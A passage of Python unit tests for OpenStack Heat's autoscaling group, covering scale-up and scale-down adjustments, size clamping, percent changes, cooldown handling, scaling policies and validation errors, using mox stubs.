        self._stub_meta_expected(now, 'ChangeInCapacity : 2')
        self._stub_create(2)
        self._stub_scale_notification(adjust=2, groupname=rsrc.FnGetRefId(),
                                      start_capacity=1, end_capacity=3)
        self.m.ReplayAll()
        rsrc.adjust(2)
        self.assertEqual(3, len(rsrc.get_instance_names()))
        # set to 2
        self._stub_lb_reload(2)
        self._stub_delete(1)
        self.stub_ImageConstraint_validate(num=2)
        self._stub_meta_expected(now, 'ExactCapacity : 2')
        self._stub_scale_notification(adjust=2, groupname=rsrc.FnGetRefId(),
                                      adjust_type='ExactCapacity',
                                      start_capacity=3, end_capacity=2)
        self.m.ReplayAll()
        rsrc.adjust(2, 'ExactCapacity')
        self.assertEqual(2, len(rsrc.get_instance_names()))
        self.m.VerifyAll()
    def test_scaling_group_scale_up_failure(self):
        """A failed scale-up raises and leaves capacity unchanged."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        self.m.VerifyAll()
        self.m.UnsetStubs()
        # Scale up one 1 instance with resource failure
        self._stub_create(1, with_error='Bang')
        self._stub_lb_reload(1, unset=False, nochange=True)
        self._stub_scale_notification(adjust=1,
                                      groupname=rsrc.FnGetRefId(),
                                      start_capacity=1,
                                      with_error='Bang')
        self.m.ReplayAll()
        self.assertRaises(exception.Error, rsrc.adjust, 1)
        # Capacity must remain at the pre-adjust value.
        self.assertEqual(1, len(rsrc.get_instance_names()))
        self.m.VerifyAll()
    def test_scaling_group_truncate_adjustment(self):
        """Adjustments beyond Min/MaxSize are clamped to the bounds."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group, 2 instances
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        self._stub_lb_reload(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self._stub_create(2)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # raise above the max
        self._stub_lb_reload(5)
        self._stub_meta_expected(now, 'ChangeInCapacity : 4')
        self._stub_create(3)
        self.m.ReplayAll()
        rsrc.adjust(4)
        # Clamped at MaxSize (5) rather than 2 + 4 = 6.
        self.assertEqual(5, len(rsrc.get_instance_names()))
        # lower below the min
        self._stub_lb_reload(1)
        self._stub_delete(4)
        self.stub_ImageConstraint_validate(num=1)
        self._stub_meta_expected(now, 'ChangeInCapacity : -5')
        self.m.ReplayAll()
        rsrc.adjust(-5)
        # Clamped at MinSize (1) rather than going to zero.
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # no change
        self.m.VerifyAll()
        self.m.UnsetStubs()
        self._stub_meta_expected(now)
        self.m.ReplayAll()
        rsrc.adjust(0)
        self.assertEqual(1, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def _do_test_scaling_group_percent(self, decrease, lowest,
                                       increase, create, highest):
        """Shared driver for PercentChangeInCapacity adjust tests.

        Starts a group of 2, applies *decrease* percent (expecting
        *lowest* instances to remain), then *increase* percent
        (expecting *create* new instances and *highest* total).
        """
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group, 2 instances
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        self._stub_lb_reload(2)
        self._stub_create(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # reduce by decrease %
        self._stub_lb_reload(lowest)
        adjust = 'PercentChangeInCapacity : %d' % decrease
        self._stub_meta_expected(now, adjust)
        self._stub_delete(2 - lowest)
        self.stub_ImageConstraint_validate(num=1)
        self.m.ReplayAll()
        rsrc.adjust(decrease, 'PercentChangeInCapacity')
        self.assertEqual(lowest, len(rsrc.get_instance_names()))
        # raise by increase %
        self._stub_lb_reload(highest)
        adjust = 'PercentChangeInCapacity : %d' % increase
        self._stub_meta_expected(now, adjust)
        self._stub_create(create)
        self.m.ReplayAll()
        rsrc.adjust(increase, 'PercentChangeInCapacity')
        self.assertEqual(highest, len(rsrc.get_instance_names()))
        rsrc.delete()
        # NOTE(review): no VerifyAll() here, unlike the sibling tests --
        # presumably mock verification happens in test teardown; confirm.
def test_scaling_group_percent(self):
self._do_test_scaling_group_percent(-50, 1, 200, 2, 3)
def test_scaling_group_percent_round_up(self):
self._do_test_scaling_group_percent(-33, 1, 33, 1, 2)
def test_scaling_group_percent_round_down(self):
self._do_test_scaling_group_percent(-66, 1, 225, 2, 3)
    def test_scaling_group_cooldown_toosoon(self):
        """An adjust within the Cooldown window is ignored."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group, 2 instances, Cooldown 60s
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        properties['Cooldown'] = '60'
        self._stub_lb_reload(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self._stub_create(2)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # reduce by 50%
        self._stub_lb_reload(1)
        self._stub_delete(1)
        self.stub_ImageConstraint_validate(num=1)
        self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
        self.m.StubOutWithMock(resource.Resource, 'metadata_get')
        # Note: in reality the group create is counted as a cooldown event, so
        # there would actually be metadata here and the scale up would not
        # happen
        resource.Resource.metadata_get().MultipleTimes().AndReturn({})
        self.m.ReplayAll()
        rsrc.adjust(-50, 'PercentChangeInCapacity')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Now move time on 10 seconds - Cooldown in template is 60
        # so this should not update the policy metadata, and the
        # scaling group instances should be unchanged
        # Note we have to stub Resource.metadata_get since up_policy isn't
        # stored in the DB (because the stack hasn't really been created)
        previous_meta = {'cooldown': {now.isoformat():
                                      'PercentChangeInCapacity : -50'}}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        now = now + datetime.timedelta(seconds=10)
        timeutils.set_time_override(now)
        self.addCleanup(timeutils.clear_time_override)
        self.m.StubOutWithMock(resource.Resource, 'metadata_get')
        rsrc.metadata_get().MultipleTimes().AndReturn(previous_meta)
        self.m.ReplayAll()
        # raise by 200%, too soon for Cooldown so there should be no change
        rsrc.adjust(200, 'PercentChangeInCapacity')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        rsrc.delete()
    def test_scaling_group_cooldown_ok(self):
        """An adjust after the Cooldown window has expired proceeds."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group, 2 instances, Cooldown 60s
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        properties['Cooldown'] = '60'
        self._stub_lb_reload(2)
        self._stub_create(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # reduce by 50%
        self._stub_lb_reload(1)
        self._stub_delete(1)
        self.stub_ImageConstraint_validate(num=1)
        self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
        self.m.StubOutWithMock(resource.Resource, 'metadata_get')
        # Note: in reality the group create is counted as a cooldown event, so
        # there would actually be metadata here and the scale up would not
        # happen
        resource.Resource.metadata_get().MultipleTimes().AndReturn({})
        self.m.ReplayAll()
        rsrc.adjust(-50, 'PercentChangeInCapacity')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Now move time on 61 seconds - Cooldown in template is 60
        # so this should update the policy metadata, and the
        # scaling group instances updated
        previous_meta = {'cooldown': {now.isoformat():
                                      'PercentChangeInCapacity : -50'},
                         'scaling_in_progress': False}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        now = now + datetime.timedelta(seconds=61)
        self.m.StubOutWithMock(resource.Resource, 'metadata_get')
        rsrc.metadata_get().MultipleTimes().AndReturn(previous_meta)
        # Stub for the metadata accesses while creating the two instances
        resource.Resource.metadata_get()
        resource.Resource.metadata_get()
        # raise by 200%, should work
        self._stub_lb_reload(3, unset=False)
        self._stub_create(2)
        self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
        self.m.ReplayAll()
        rsrc.adjust(200, 'PercentChangeInCapacity')
        self.assertEqual(3, len(rsrc.get_instance_names()))
        rsrc.delete()
    def test_scaling_group_cooldown_zero(self):
        """With Cooldown=0, back-to-back adjusts both take effect."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group, 2 instances, Cooldown 0
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        properties['Cooldown'] = '0'
        self._stub_lb_reload(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self._stub_create(2)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # reduce by 50%
        self._stub_lb_reload(1)
        self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
        self._stub_delete(1)
        self.stub_ImageConstraint_validate(num=1)
        init_meta = {'cooldown': {now.isoformat(): 'ExactCapacity : -50'},
                     'scaling_in_progress': False}
        self.m.StubOutWithMock(resource.Resource, 'metadata_get')
        resource.Resource.metadata_get().MultipleTimes().AndReturn(init_meta)
        self.m.ReplayAll()
        rsrc.adjust(-50, 'PercentChangeInCapacity')
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Don't move time, since cooldown is zero, it should work
        previous_meta = {'cooldown': {now.isoformat():
                                      'PercentChangeInCapacity : -50'},
                         'scaling_in_progress': False}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        self.m.StubOutWithMock(resource.Resource, 'metadata_get')
        rsrc.metadata_get().MultipleTimes().AndReturn(previous_meta)
        # raise by 200%, should work
        self._stub_lb_reload(3, unset=False)
        self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
        self._stub_create(2)
        self.m.ReplayAll()
        rsrc.adjust(200, 'PercentChangeInCapacity')
        self.assertEqual(3, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_bad_group(self):
        """Signalling a policy whose group doesn't exist fails clearly."""
        t = template_format.parse(as_template_bad_group)
        stack = utils.parse_stack(t, params=self.params)
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        # The alarm URL attribute is still resolvable on a broken policy.
        alarm_url = up_policy.FnGetAtt('AlarmUrl')
        self.assertIsNotNone(alarm_url)
        ex = self.assertRaises(exception.ResourceFailure, up_policy.signal)
        self.assertIn('Alarm WebServerScaleUpPolicy could '
                      'not find scaling group', six.text_type(ex))
        self.m.VerifyAll()
    def test_scaling_policy_up(self):
        """Signalling a scale-up policy grows the group by one."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Scale up one
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        alarm_url = up_policy.FnGetAtt('AlarmUrl')
        self.assertIsNotNone(alarm_url)
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_up_meta_update(self):
        """Scaling up refreshes metadata on resources that reference
        the group's InstanceList via Fn::GetAtt."""
        t = template_format.parse(as_template)
        # Add CustomLB (just AWS::EC2::Instance) to template
        t['Resources']['MyCustomLB'] = {
            'Type': 'AWS::EC2::Instance',
            'ImageId': {'Ref': 'ImageId'},
            'InstanceType': 'bar',
            'Metadata': {
                'IPs': {'Fn::GetAtt': ['WebServerGroup', 'InstanceList']}
            }
        }
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Scale up one
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        alarm_url = up_policy.FnGetAtt('AlarmUrl')
        self.assertIsNotNone(alarm_url)
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # Check CustomLB metadata was updated
        self.m.StubOutWithMock(instance.Instance, '_ipaddress')
        instance.Instance._ipaddress().MultipleTimes().AndReturn(
            '127.0.0.1')
        self.m.ReplayAll()
        # Both group members report the stubbed address, comma-joined.
        expected_meta = {'IPs': u'127.0.0.1,127.0.0.1'}
        self.assertEqual(expected_meta, stack['MyCustomLB'].metadata_get())
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_down(self):
        """Signalling a scale-down policy shrinks the group by one."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group, 2 instances
        properties = t['Resources']['WebServerGroup']['Properties']
        properties['DesiredCapacity'] = '2'
        self._stub_lb_reload(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
        self._stub_create(2)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # Scale down one
        self._stub_lb_reload(1)
        self._stub_delete(1)
        self.stub_ImageConstraint_validate(num=1)
        self._stub_meta_expected(now, 'ChangeInCapacity : -1', 2)
        self.m.ReplayAll()
        down_policy = self.create_scaling_policy(t, stack,
                                                 'WebServerScaleDownPolicy')
        down_policy.signal()
        self.assertEqual(1, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_cooldown_toosoon(self):
        """A policy signal within its Cooldown window is a no-op."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Scale up one
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        up_policy = stack['WebServerScaleUpPolicy']
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn({})
        # Note: in reality the group create is counted as a cooldown event, so
        # there would actually be metadata here and the scale up would not
        # happen
        rsrc.metadata_get().MultipleTimes().AndReturn({})
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # Now move time on 10 seconds - Cooldown in template is 60
        # so this should not update the policy metadata, and the
        # scaling group instances should be unchanged
        # Note we have to stub Resource.metadata_get since up_policy isn't
        # stored in the DB (because the stack hasn't really been created)
        prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
                     'scaling_in_progress': False}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        now = now + datetime.timedelta(seconds=10)
        timeutils.set_time_override(now)
        self.addCleanup(timeutils.clear_time_override)
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().AndReturn(prev_meta.copy())
        self.m.ReplayAll()
        up_policy.signal()
        # Still 2 instances - the second signal was inside the cooldown.
        self.assertEqual(2, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_cooldown_ok(self):
        """A policy signal after the Cooldown window triggers scaling."""
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Scale up one
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        up_policy = stack['WebServerScaleUpPolicy']
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn({})
        # Note: in reality the group create is counted as a cooldown event, so
        # there would actually be metadata here and the scale up would not
        # happen
        rsrc.metadata_get().MultipleTimes().AndReturn({})
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        self.m.VerifyAll()
        self.m.UnsetStubs()
        # Now move time on 61 seconds - Cooldown in template is 60
        # so this should trigger a scale-up
        prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
                     'scaling_in_progress': False}
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        now = now + datetime.timedelta(seconds=61)
        self._stub_lb_reload(3, unset=False)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.ReplayAll()
        up_policy.signal()
        self.assertEqual(3, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_cooldown_zero(self):
        """With policy Cooldown=0, an immediate second signal scales again."""
        t = template_format.parse(as_template)
        # Create the scaling policy (with Cooldown=0) and scale up one
        properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
        properties['Cooldown'] = '0'
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # Now trigger another scale-up without changing time, should work
        prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
                     'scaling_in_progress': False}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        self._stub_lb_reload(3, unset=False)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.ReplayAll()
        up_policy.signal()
        self.assertEqual(3, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_cooldown_none(self):
        """An absent Cooldown property behaves like Cooldown=0."""
        t = template_format.parse(as_template)
        # Create the scaling policy no Cooldown property, should behave the
        # same as when Cooldown==0
        properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
        del properties['Cooldown']
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        self._stub_lb_reload(2)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        init_meta = {'cooldown': {now.isoformat(): 'ExactCapacity : 1'},
                     'scaling_in_progress': False}
        up_policy = stack['WebServerScaleUpPolicy']
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn(init_meta.copy())
        rsrc.metadata_get().MultipleTimes().AndReturn(init_meta.copy())
        self.m.ReplayAll()
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # Now trigger another scale-up without changing time, should work
        prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
                     'scaling_in_progress': False}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        self._stub_lb_reload(3, unset=False)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.ReplayAll()
        up_policy.signal()
        self.assertEqual(3, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
    def test_scaling_policy_update(self):
        """Updating a policy's ScalingAdjustment changes later signals.

        After the adjustment is raised from 1 to 2, a post-cooldown
        signal grows the group by two instances instead of one.
        """
        t = template_format.parse(as_template)
        stack = utils.parse_stack(t, params=self.params)
        # Create initial group
        self._stub_lb_reload(1)
        now = timeutils.utcnow()
        self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
        self._stub_create(1)
        self.m.ReplayAll()
        rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
        stack.resources['WebServerGroup'] = rsrc
        self.assertEqual(1, len(rsrc.get_instance_names()))
        # Create initial scaling policy
        up_policy = self.create_scaling_policy(t, stack,
                                               'WebServerScaleUpPolicy')
        # Scale up one
        self._stub_lb_reload(2)
        self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
        self._stub_create(1)
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn({})
        # Note: in reality the group create is counted as a cooldown event, so
        # there would actually be metadata here and the scale up would not
        # happen
        rsrc.metadata_get().MultipleTimes().AndReturn({})
        self.m.ReplayAll()
        # Trigger alarm
        up_policy.signal()
        self.assertEqual(2, len(rsrc.get_instance_names()))
        # Update scaling policy
        props = copy.copy(up_policy.properties.data)
        props['ScalingAdjustment'] = '2'
        update_snippet = rsrc_defn.ResourceDefinition(up_policy.name,
                                                      up_policy.type(),
                                                      props)
        scheduler.TaskRunner(up_policy.update, update_snippet)()
        self.assertEqual(2, up_policy.properties['ScalingAdjustment'])
        # Now move time on 61 seconds - Cooldown in template is 60
        # so this should trigger a scale-up
        prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
                     'scaling_in_progress': False}
        self.m.VerifyAll()
        self.m.UnsetStubs()
        self.m.StubOutWithMock(rsrc, 'metadata_get')
        self.m.StubOutWithMock(up_policy, 'metadata_get')
        up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
        now = now + datetime.timedelta(seconds=61)
        self._stub_lb_reload(4, unset=False)
        self._stub_meta_expected(now, 'ChangeInCapacity : 2', 2)
        self._stub_create(2)
        self.m.ReplayAll()
        # Trigger alarm
        up_policy.signal()
        self.assertEqual(4, len(rsrc.get_instance_names()))
        rsrc.delete()
        self.m.VerifyAll()
def test_vpc_zone_identifier(self):
    """A single VPCZoneIdentifier subnet is passed through to the instance.

    Creates a scaling group of one instance inside a VPC and checks that
    the subnet id from the template ends up as the instance's SubnetId.
    """
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['VPCZoneIdentifier'] = ['xxxx']
    stack = utils.parse_stack(t, params=self.params)
    self._stub_lb_reload(1)
    now = timeutils.utcnow()
    self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
    self._stub_create(1)
    self.m.ReplayAll()
    rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
    instances = rsrc.get_instances()
    self.assertEqual(1, len(instances))
    # The sole VPCZoneIdentifier entry becomes the instance's SubnetId.
    self.assertEqual('xxxx', instances[0].properties['SubnetId'])
    rsrc.delete()
    self.m.VerifyAll()
def test_toomany_vpc_zone_identifier(self):
    """More than one VPCZoneIdentifier subnet raises NotSupported."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    # Two subnets: only a single subnet per group is supported.
    properties['VPCZoneIdentifier'] = ['xxxx', 'yyyy']
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    self.assertRaises(exception.NotSupported,
                      self.create_scaling_group, t,
                      stack, 'WebServerGroup')
    self.m.VerifyAll()
def test_invalid_min_size(self):
    """A negative MinSize fails stack validation with a clear message."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '-1'
    properties['MaxSize'] = '2'
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'WebServerGroup')
    expected_msg = "The size of AutoScalingGroup can not be less than zero"
    self.assertEqual(expected_msg, six.text_type(e))
    self.m.VerifyAll()
def test_invalid_max_size(self):
    """MinSize greater than MaxSize fails stack validation."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '3'
    properties['MaxSize'] = '1'
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'WebServerGroup')
    expected_msg = "MinSize can not be greater than MaxSize"
    self.assertEqual(expected_msg, six.text_type(e))
    self.m.VerifyAll()
def test_invalid_desiredcapacity(self):
    """DesiredCapacity above MaxSize fails stack validation."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '1'
    properties['MaxSize'] = '3'
    properties['DesiredCapacity'] = '4'
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'WebServerGroup')
    expected_msg = "DesiredCapacity must be between MinSize and MaxSize"
    self.assertEqual(expected_msg, six.text_type(e))
    self.m.VerifyAll()
def test_invalid_desiredcapacity_zero(self):
    """DesiredCapacity below MinSize (here 0 < 1) fails stack validation."""
    t = template_format.parse(as_template)
    properties = t['Resources']['WebServerGroup']['Properties']
    properties['MinSize'] = '1'
    properties['MaxSize'] = '3'
    properties['DesiredCapacity'] = '0'
    stack = utils.parse_stack(t, params=self.params)
    self.stub_ImageConstraint_validate()
    self.m.ReplayAll()
    e = self.assertRaises(exception.StackValidationFailed,
                          self.create_scaling_group, t,
                          stack, 'WebServerGroup')
    expected_msg = "DesiredCapacity must be between MinSize and MaxSize"
    self.assertEqual(expected_msg, six.text_type(e))
    self.m.VerifyAll()
def test_child_template_uses_min_size(self):
    """Without DesiredCapacity the nested template is sized by MinSize."""
    t = template_format.parse(as_template)
    stack = utils.parse_stack(t, params=self.params)
    defn = rsrc_defn.ResourceDefinition(
        'asg', 'AWS::AutoScaling::AutoScalingGroup',
        {'MinSize': 2, 'MaxSize': 5, 'LaunchConfigurationName': 'foo'})
    rsrc = asc.AutoScalingGroup('asg', defn, stack)
    rsrc._create_template = mock.Mock(return_value='tpl')
    self.assertEqual('tpl', rsrc.child_template())
    # MinSize (2) drives the initial instance count.
    rsrc._create_template.assert_called_once_with(2)
def test_child_template_uses_desired_capacity(self):
